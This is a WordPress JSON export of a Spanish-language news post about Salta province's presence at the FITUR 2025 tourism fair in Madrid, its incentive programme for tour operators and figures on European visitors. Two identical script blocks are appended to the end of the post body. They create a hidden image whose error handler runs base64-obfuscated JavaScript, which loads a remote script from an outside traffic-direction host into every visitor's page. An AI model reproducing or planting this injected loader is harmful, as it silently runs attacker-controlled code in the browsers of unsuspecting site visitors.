{"id":4776,"date":"2025-01-27T16:47:58","date_gmt":"2025-01-27T19:47:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4776"},"modified":"2025-08-13T23:41:50","modified_gmt":"2025-08-14T02:41:50","slug":"fitur-2025-salta-reafirmo-su-compromiso-con-el-crecimiento-del-turismo-internacional","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4776","title":{"rendered":"FITUR 2025: Salta reafirmo su compromiso con el crecimiento del turismo internacional"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-770658c126ac7f8642bfac3767389b19\" style=\"background-color:#011c6ee0\"><em>Salta tiene presencia activa en una de las ferias de turismo m\u00e1s importantes del mundo, con el objetivo de captar turistas europeos. En alianza estrat\u00e9gica con los principales operadores nacionales e internacionales, se busca afianzar la cadena comercial y posicionar el destino a nivel global.<\/em><\/h4>\n\n\n\n<p>La Feria Internacional de Turismo (FITUR), que se desarroll\u00f3 en la ciudad de Madrid y que estuvo hasta el domingo 26 de enero, es el evento clave para trazar estrategias y generar alianzas p\u00fablico-privadas. Esta feria re\u00fane a representantes de 145 pa\u00edses, m\u00e1s de 10.000 empresas y 150.000 profesionales del sector. Por ello, la presencia de Salta en FITUR no solo es estrat\u00e9gica, sino esencial para fortalecer su proyecci\u00f3n internacional.\u00a0<\/p>\n\n\n\n<p>El equipo que representa al destino Salta estuvo encabezado por la ministra de Turismo y Deportes,\u00a0<strong>Manuela Arancibia<\/strong>\u00a0acompa\u00f1ada del presidente de la C\u00e1mara de Turismo de Salta, Facundo Assaf y otros actores del sector privado que integran dicha c\u00e1mara. Por su parte, en representaci\u00f3n del Gobierno nacional la delegaci\u00f3n Argentina la encabeza el secretario de Turismo de la Naci\u00f3n Daniel Osvaldo Scioli y el Presidente de la C\u00e1mara Argentina de Turismo (CAT) Gustavo Hani.\u00a0<\/p>\n\n\n\n<p>\u201cDesde Salta estamos trabajando con los principales operadores mayoristas nacionales que participan en FITUR a trav\u00e9s del programa Aliados Estrat\u00e9gicos, una herramienta clave impulsada por el Gobierno de la Provincia y el Ente Norte. Nuestro objetivo es fortalecer la cadena comercial y continuar posicionando a Salta como un destino l\u00edder en el mercado internacional\u201d, destac\u00f3 Arancibia.&nbsp;<\/p>\n\n\n\n<p>La ministra explic\u00f3 adem\u00e1s: \u201cEste programa de fidelizaci\u00f3n est\u00e1 dise\u00f1ado para operadores mayoristas nacionales que comercializan Salta. Ofrecemos fondos no reembolsables y otros beneficios para promover paquetes tur\u00edsticos al destino, tanto dentro de Argentina como en mercados internacionales. Esto no solo incrementa las ventas, sino que potencia la visibilidad y competitividad de Salta en el \u00e1mbito global\u201d.&nbsp;<\/p>\n\n\n\n<p>Salta se posiciona como el destino del norte argentino que m\u00e1s turistas extranjeros recibe, y los europeos representan el 28% de estas visitas. En particular, el mercado espa\u00f1ol constituye el 6,5% del total, con cerca de 21.000 turistas al a\u00f1o. Los visitantes espa\u00f1oles muestran una marcada preferencia por experiencias culturales, como museos y pe\u00f1as folkl\u00f3ricas, as\u00ed como por la oferta gastron\u00f3mica y vitivin\u00edcola que caracteriza a la Ruta del Vino de Altura. Adem\u00e1s, eligen actividades en contacto con la naturaleza, interacci\u00f3n con comunidades locales, experiencias con emprendedores y, por supuesto, vivir el Tren a las Nubes, el emblema tur\u00edstico internacional de la provincia.&nbsp;<\/p>\n\n\n\n<p>La participaci\u00f3n activa de Salta en FITUR refuerza la importancia de mantener una presencia constante en esta feria. Este espacio no solo permite abrir nuevas oportunidades en el mercado europeo, sino que tambi\u00e9n fortalece la colaboraci\u00f3n con operadores internacionales, posicionando a Salta como un destino imprescindible en el turismo global.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Salta tiene presencia activa en una de las ferias de turismo m\u00e1s importantes del mundo, con el objetivo de captar turistas europeos. En alianza estrat\u00e9gica con los principales operadores nacionales e internacionales, se busca afianzar la cadena comercial y posicionar el destino a nivel global. La Feria Internacional de Turismo (FITUR), que se desarroll\u00f3 en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4777,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-4776","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4776"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4776"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4776\/revisions"}],"predecessor-version":[{"id":6587,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4776\/revisions\/6587"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4777"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4776"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4776"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4776"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}